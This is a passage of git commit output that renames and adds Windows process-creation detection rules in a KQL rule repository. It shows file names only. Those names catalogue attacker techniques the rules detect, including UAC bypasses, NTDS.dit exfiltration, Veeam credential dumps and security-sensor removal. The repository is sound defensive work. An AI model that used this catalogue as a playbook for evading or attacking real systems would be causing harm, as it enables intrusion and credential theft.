KQL/rules/{Defense Evasion => windows/process_creation}/start_of_nt_virtual_dos_machine.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/start_windows_service_via_net_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/sticky_key_like_backdoor_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/stop_windows_service_via_net_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/stop_windows_service_via_powershell_stop_service.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/stop_windows_service_via_sc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspect_svchost_activity.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_active_directory_database_snapshot_via_adexplorer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_advpack_call_via_rundll32_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_agentexecutor_powershell_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_autorun_registry_modified_via_wmi.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_binary_in_user_directory_spawned_from_office_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_bitlocker_access_agent_update_utility_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_cabinet_file_execution_via_msdt_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_calculator_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_certreq_command_to_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_child_process_created_as_system.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_child_process_of_aspnetcompiler.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_child_process_of_bginfo_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_child_process_of_manage_engine_servicedesk.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_child_process_of_sql_server.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_child_process_of_veeam_dabatase.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_child_process_of_wermgr_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_chromium_browser_instance_executed_with_custom_extension.kql (100%) create mode 100644 KQL/rules/windows/process_creation/suspicious_clickfix_filefix_execution_pattern.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_codepage_switch_via_chcp.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_command_patterns_in_scheduled_task_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_control_panel_dll_load.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_copy_from_or_to_system_directory.kql (69%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_csi_exe_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_curl_exe_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_customshellhost_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_debugger_registration_cmdline.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_desktopimgdownldr_command.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_diantz_alternate_data_stream_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_diantz_download_and_compress_into_a_cab_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_dll_loaded_via_certoc_exe.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_double_extension_file_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_download_from_direct_ip_via_bitsadmin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_download_from_file_sharing_website_via_bitsadmin.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_download_from_office_domain.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_download_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_driver_dll_installation_via_odbcconf_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_driver_install_by_pnputil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_dumpminitool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_electron_application_child_processes.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_encoded_powershell_command_line.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_eventlog_clearing_or_configuration_change_activity.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_execution_from_outlook_temporary_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_execution_location_of_wermgr_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_execution_of_hostname.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_execution_of_installutil_without_log.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_execution_of_powershell_with_base64.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/suspicious_execution_of_shutdown.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/suspicious_execution_of_shutdown_to_log_out.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_execution_of_systeminfo.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql (50%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_extrac32_alternate_data_stream_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_extrac32_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_characteristics_due_to_missing_fields.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_ip_via_curl_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_ip_via_wget_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_download_from_ip_via_wget_exe_paths.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_file_encoded_to_base64_via_certutil_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_file_execution_from_internet_hosted_webdav_share.kql (100%) create mode 100644 KQL/rules/windows/process_creation/suspicious_filefix_execution_pattern.kql rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_frombase64string_usage_on_gzip_archive_process_creation.kql (100%) rename KQL/rules/{Reconnaissance => windows/process_creation}/suspicious_git_clone.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_greedy_compression_using_rar_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_grpconv_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_gup_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_hh_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_high_integritylevel_conhost_legacy_option.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_hwp_sub_processes.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_iis_module_registration.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_invoke_webrequest_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_invoke_webrequest_execution_with_directip.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_javascript_execution_via_mshta_exe.kql (100%) create mode 100644 KQL/rules/windows/process_creation/suspicious_kerberos_ticket_request_via_cli.kql rename KQL/rules/{Discovery => windows/process_creation}/suspicious_kernel_dump_using_dtrace.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_key_manager_access.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_lnk_command_line_padding_with_whitespace_characters.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/suspicious_manipulation_of_default_accounts_via_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_microsoft_office_child_process.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_microsoft_onenote_child_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_modification_of_scheduled_tasks.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msbuild_execution_by_uncommon_parent_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msdt_parent_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_mshta_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_mshta_exe_execution_patterns.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msiexec_embedding_parent.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msiexec_execute_arbitrary_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_msiexec_quiet_install_from_remote_location.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_mstsc_exe_execution_with_local_rdp_file.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_network_command.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_new_service_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_obfuscated_powershell_code.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_outlook_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_parent_double_extension_file_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_ping_del_command_combination.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_plink_port_forwarding.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_powercfg_execution_to_change_lock_screen_timeout.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_download_and_execute_pattern.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_encoded_command_patterns.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_iex_execution_patterns.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_powershell_invocations_specific_processcreation.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/suspicious_powershell_mailbox_export_to_share.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_parameter_substring.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_powershell_parent_process.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_process_by_web_server_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_process_created_via_wmic_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_process_execution_from_fake_recycle_bin_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_process_masquerading_as_svchost_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_process_parents.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_process_patterns_ntds_dit_exfil.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_process_start_locations.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_processes_spawned_by_java_exe.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_processes_spawned_by_winrm.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_program_location_whitelisted_in_firewall_via_netsh_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_program_names.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_provlaunch_exe_child_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_query_of_machineguid.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rasdial_activity.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_rdp_redirect_using_tscon.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_recursive_takeown.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/suspicious_redirection_to_local_admin_share.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/suspicious_reg_add_bitlocker.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_reg_add_open_command.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_registry_modification_from_ads_via_regini_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_regsvr32_execution_from_remote_share.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_remote_child_process_from_outlook.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_response_file_execution_via_odbcconf_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_runas_like_flag_combination.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rundll32_activity_invoking_sys_file.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rundll32_execution_with_image_extension.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_rundll32_invoking_inline_vbscript.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_rundll32_setupapi_dll_activity.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_runscripthelper_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_scan_loop_network.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_scheduled_task_creation_involving_temp_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_scheduled_task_name_as_guid.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_schtasks_execution_appdata_folder.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_schtasks_schedule_type_with_high_privileges.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_schtasks_schedule_types.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_screensave_change_by_reg_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_script_execution_from_temp_folder.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_serv_u_process_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_service_binary_directory.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_service_dacl_modification_via_set_service_cmdlet.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_service_path_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_shellexec_rundll_call_via_ordinal.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/suspicious_shells_spawn_by_java_utility_keytool.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_speech_runtime_binary_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_splwow64_without_params.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_spool_service_child_process.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_sysaidserver_child.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_system_user_process_creation.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_sysvol_domain_group_policy_access.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_tscon_start_as_system.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/suspicious_ultravnc_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql (100%) create mode 100644 KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_usage_of_shellexec_rundll.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_use_of_csharp_interactive_console.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_use_of_psloglist.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/suspicious_userinit_child_process.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/suspicious_vboxdrvinst_exe_parameters.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/suspicious_velociraptor_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_vsls_agent_command_with_agentextensionpath_load.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/suspicious_webdav_client_execution_via_rundll32_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/suspicious_where_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_service_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_windows_update_agent_empty_cmdline.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_windowsterminal_child_processes.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_wmic_execution_via_office_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_wmiprvse_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_workstation_locking_via_rundll32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_x509enrollment_process_creation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/suspicious_xor_encoded_powershell_command.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/suspicious_zipexec_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/syncappvpublishingserver_execute_arbitrary_powershell_code.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/sysinternals_psservice_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/sysinternals_pssuspend_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sysinternals_pssuspend_suspicious_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sysmon_configuration_update.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sysmon_driver_unloaded_via_fltmc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/sysprep_on_appdata_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/system_disk_and_volume_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/system_file_execution_location_anomaly.kql (57%) rename KQL/rules/{Discovery => windows/process_creation}/system_information_discovery_via_registry_queries.kql (55%) rename KQL/rules/{Discovery => windows/process_creation}/system_network_connections_discovery_via_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/tamper_windows_defender_remove_mppreference.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/tap_installer_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/taskkill_symantec_endpoint_protection.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/taskmgr_as_local_system.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/tasks_folder_evasion.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/terminal_service_process_spawn.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/time_travel_debugging_utility_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/tor_client_browser_execution.kql (59%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/trustedpath_uac_bypass_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_abusing_winsat_path_parsing_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_tools_using_computerdefaults.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_changepk_and_slui.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_consent_and_comctl32_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_disk_cleanup.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_dismhost.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_event_viewer_recentviews.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/uac_bypass_using_idiagnostic_profile.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_ieinstal_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_msconfig_token_modification_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_ntfs_reparse_point_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_pkgmgr_and_dism.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_windows_media_player_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_via_icmluautil.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_via_windows_firewall_snap_in_hijack.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_wsreset.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/uefi_persistence_via_wpbbin_processcreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_addinutil_exe_commandline_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_addinutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_appvlp_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/uncommon_child_process_of_bginfo_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_defaultpack_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_setres_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_spawned_by_odbcconf_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/uncommon_child_processes_of_sndvol_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_filesystem_load_attempt_by_format_com.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_link_exe_parent_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/uncommon_one_time_only_scheduled_task_at_00_00.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_sigverif_exe_child_process.kql (100%) create mode 100644 KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_svchost_parent_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/uncommon_system_information_discovery_via_wmic_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/uncommon_userinit_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uninstall_crowdstrike_falcon_sensor.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uninstall_sysinternals_sysmon.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/unmount_share_via_net_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/unsigned_appx_installation_attempt_using_add_appxpackage.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/unusual_child_process_of_dns_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/unusual_parent_process_for_cmd_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/usage_of_web_request_commands_and_cmdlets.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_icacls_to_hide_file_to_everyone.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_ntfs_short_name_in_command_line.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_ntfs_short_name_in_image.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/use_of_fsharp_interpreters.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/use_of_openconsole.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/use_of_pcalua_for_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_remote_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_scriptrunner_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_the_sftp_exe_binary_as_a_lolbin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_ttdinject_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/use_of_ultravnc_remote_access_software.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_visualuiaverifynative_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_vsiisexelauncher_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/use_of_w32tm_as_timer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_wfc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_short_name_path_in_image.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/user_added_to_highly_privileged_group.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/user_added_to_local_administrators_group.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/user_added_to_remote_desktop_users_group.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/user_discovery_and_export_via_get_aduser_cmdlet.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/using_settingsynchost_exe_as_lolbin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/utilityfunctions_ps1_proxy_dll.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/veeam_backup_database_suspicious_query.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/verclsid_exe_runs_com_object.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/virtualbox_driver_installation_or_starting_of_vms.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/visual_basic_command_line_compiler_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/visual_studio_code_tunnel_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/visual_studio_code_tunnel_service_installation.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/visual_studio_code_tunnel_shell_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/visual_studio_nodejstools_pressanykey_renamed_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/vmtoolsd_suspicious_child_process.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/volumeshadowcopy_symlink_creation_via_mklink.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wab_execution_from_non_default_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wab_wabmig_unusual_parent_or_child_processes.kql (100%) rename KQL/rules/{Defense Evasion => 